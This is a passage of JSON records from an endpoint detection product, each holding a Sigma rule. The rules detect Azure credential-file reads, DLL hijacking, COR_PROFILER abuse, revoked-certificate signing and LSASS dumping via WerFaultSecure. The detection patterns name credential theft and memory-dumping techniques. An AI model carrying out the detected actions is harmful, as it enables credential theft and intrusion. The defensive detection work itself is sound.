'%SystemRoot%\\system32\\sdclt.exe'\n - '%SystemRoot%\\System32\\cleanmgr.exe'\n - '%systemroot%\\system32\\dfrgui.exe'\n - '%systemroot%\\system32\\wbadmin.msc'\n\n exclusion_iobit:\n ProcessImage:\n - '?:\\Program Files\\iobit\\advanced systemcare\\ascinit.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\ascinit.exe'\n Details:\n - '?:\\Program Files\\iobit\\advanced systemcare\\diskdefrag.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\diskdefrag.exe'\n\n exclusion_defraggler:\n Details:\n - '?:\\program files\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\defraggler\\defraggler64.exe'\n - '?:\\program files\\utilitaires disque\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\utilitaires disque\\defraggler\\defraggler64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "323dc7e5-08a1-429c-83b5-3df588b5a245", + "rule_name": "Possible Explorer Tools Persistence Added", + "rule_description": "Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\nThis method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\nIt is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\n", + "rule_creation_date": "2022-07-20", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1546" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3309bac8-843b-4a14-91b2-c7af144c1be8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.625588Z", + "creation_date": "2026-03-23T11:45:34.625590Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.625594Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1552/001/" + ], + "name": "t1552_004_azure_config_read_macos.yml", + "content": "title: Suspicious Access to Azure Configuration File\nid: 3309bac8-843b-4a14-91b2-c7af144c1be8\ndescription: |\n Detects an attempt to read the contents of the Azure configuration file.\n Adversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 
3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/.azure/azureProfile.json'\n - '/Users/*/.azure/accessTokens.json'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: 
'/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_az_python:\n ProcessSigned: 'true'\n 
ProcessSignatureSigningId: 'org.python.python'\n ProcessParentCommandLine|contains: '/opt/homebrew/bin/az '\n\n exclusion_jq:\n ProcessCommandLine: 'jq -r [.subscriptions[]|select(.isDefault==true)|.name][]|strings /Users/*/.azure/azureProfile.json'\n\n exclusion_claude:\n Image: '/opt/homebrew/Caskroom/claude-code/*/claude'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3309bac8-843b-4a14-91b2-c7af144c1be8", + "rule_name": "Suspicious Access to Azure Configuration File", + "rule_description": "Detects an attempt to read the contents of the Azure configuration file.\nAdversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n", + "rule_creation_date": "2024-06-18", + "rule_modified_date": "2025-12-22", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1552.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, 
+ "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.071261Z", + "creation_date": "2026-03-23T11:45:34.071263Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.071267Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/", + "https://attack.mitre.org/techniques/T1553/002/" + ], + "name": "t1553_002_anydesk_revoked_certificate.yml", + "content": "title: Process Executed Signed with AnyDesk Revoked Certificate\nid: 331fa9c5-fe30-471e-ba82-51940fe0a2d3\ndescription: |\n Detects the execution of a process signed using the AnyDesk revoked certificate.\n This certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2024/02/20\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '9cd1ddb78ed05282353b20cdfe8fa0a4fb6c1ece'\n\n filter_anydesk:\n OriginalFileName: ''\n Description: 'AnyDesk'\n Company: 'AnyDesk Software GmbH'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3", + 
"rule_name": "Process Executed Signed with AnyDesk Revoked Certificate", + "rule_description": "Detects the execution of a process signed using the AnyDesk revoked certificate.\nThis certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\nIt is recommended to investigate the process to determine its legitimacy.\n", + "rule_creation_date": "2024-02-20", + "rule_modified_date": "2025-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "336d6115-e9ff-4197-b4b0-9fb7e4469941", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097696Z", + "creation_date": "2026-03-23T11:45:34.097698Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097702Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + 
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_vds.yml", + "content": "title: DLL Hijacking via vds.exe\nid: 336d6115-e9ff-4197-b4b0-9fb7e4469941\ndescription: |\n Detects potential Windows DLL Hijacking via vds.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vds.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\OSUNINST.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: 
strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "336d6115-e9ff-4197-b4b0-9fb7e4469941", + "rule_name": "DLL Hijacking via vds.exe", + "rule_description": "Detects potential Windows DLL Hijacking via vds.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "337d171f-6a34-4f7a-8369-d2c7d895322e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:34.619359Z", + "creation_date": "2026-03-23T11:45:34.619361Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.619365Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://offsec.almond.consulting/UAC-bypass-dotnet.html", + "https://redcanary.com/blog/cor_profiler-for-persistence/", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://attack.mitre.org/techniques/T1574/012/" + ], + "name": "t1574_012_clr_profiler_process_environement_variable_powershell.yml", + "content": "title: .NET CLR Profiler Environment Variable Set via PowerShell\nid: 337d171f-6a34-4f7a-8369-d2c7d895322e\ndescription: |\n Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\n COR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\n However, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\n It is recommended to investigate the PowerShell script responsible for this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - 
classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains: '$env:COR_PROFILER'\n\n condition: selection\nlevel: medium\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "337d171f-6a34-4f7a-8369-d2c7d895322e", + "rule_name": ".NET CLR Profiler Environment Variable Set via PowerShell", + "rule_description": "Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\nCOR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\nHowever, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\nIt is recommended to investigate the PowerShell script responsible for this action.\n", + "rule_creation_date": "2022-12-23", + "rule_modified_date": "2025-02-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1574.012" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + 
"origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097496Z", + "creation_date": "2026-03-23T11:45:34.097498Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097502Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_msidb.yml", + "content": "title: DLL Hijacking via MsiDb.exe\nid: 33c950a0-ccc5-4ddb-a153-b5550bf0d290\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n 
- attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiDb.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290", + "rule_name": "DLL Hijacking via MsiDb.exe", + "rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-10-05", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + 
"attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "33d2f606-2c1d-494f-9455-fba0a918e6eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086132Z", + "creation_date": "2026-03-23T11:45:34.086134Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086139Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html", + "https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html", + "https://attack.mitre.org/techniques/T1003/001/", + "https://attack.mitre.org/techniques/T1068/" + ], + "name": "t1003_001_werfaultsecure_bitmask.yml", + "content": "title: Suspicious WerFaultSecure Execution\nid: 33d2f606-2c1d-494f-9455-fba0a918e6eb\ndescription: |\n Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\n WerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\n This rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\n 
Attackers can abuse this legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\n It is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2025/09/22\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WSASS\n - classification.Windows.HackTool.EDRFreeze\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n CommandLine|contains: '/type 268310' # MiniDumpWithFullMemory | MiniDumpWithHandleData | MiniDumpScanMemory | MiniDumpWithFullMemoryInfo | MiniDumpWithThreadInfo | MiniDumpWithTokenInformation\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "33d2f606-2c1d-494f-9455-fba0a918e6eb", + "rule_name": "Suspicious WerFaultSecure Execution", + "rule_description": "Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\nWerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\nThis rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\nAttackers can abuse this 
legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\nIt is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\n", + "rule_creation_date": "2025-09-22", + "rule_modified_date": "2025-10-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1003.001", + "attack.t1068" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592265Z", + "creation_date": "2026-03-23T11:45:34.592268Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592275Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + 
